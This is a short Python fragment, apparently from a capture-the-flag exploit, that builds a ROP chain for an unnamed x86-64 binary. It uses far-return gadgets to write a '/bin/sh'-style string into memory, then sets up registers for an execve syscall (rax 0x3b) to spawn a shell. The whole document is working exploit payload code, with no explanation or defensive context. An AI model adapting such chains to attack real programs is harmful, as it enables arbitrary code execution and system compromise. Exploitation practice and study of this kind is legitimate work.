payload = p64(0x4011ad)
#0x00000000004011ad: pop rbp; ret; 
payload += p64(0x4e3095)+p64(0x43c190)
# 0x000000000043c190: pop rax; ret; 
payload += p64(0x6e69622f)+p64(0x447691)
# 0x447691: xchg ebx, eax ; retf
payload += p32(0x4011ac)+p32(0x33)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x4e3099)+p64(0x43c190)
# 0x000000000043c190: pop rax; ret; 
payload += p64(0x68662f)+p64(0x447691)
# 0x447691: xchg ebx, eax ; retf
payload += p32(0x4011ac)+p32(0x33)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4bb9b6)
# 0x4bb9b6: pop rsi ; retf
payload += p64(0x0)+p32(0x46910a)+p32(0x33)
# 0x46910a: pop rdx ; retf
payload += p64(0x0)+p32(0x43c190)+p32(0x33)
# 0x000000000043c190: pop rax; ret; 
payload += p64(0x4e3182)+p64(0x43c19d)
# 0x000000000043c19d: pop rdi; or dword ptr [rax], eax; cwde; ret; 
payload += p64(0x4e3058)+p64(0x43c190)
# 0x000000000043c190: pop rax; ret; 
payload += p64(0x3b)+p64(0x458ada)
# 0x0000000000458ada: syscall; 
payload += b''
